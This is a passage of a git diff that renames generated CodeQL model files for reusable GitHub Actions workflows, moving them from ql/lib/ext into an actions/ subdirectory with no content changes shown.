ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml similarity index 100% rename from 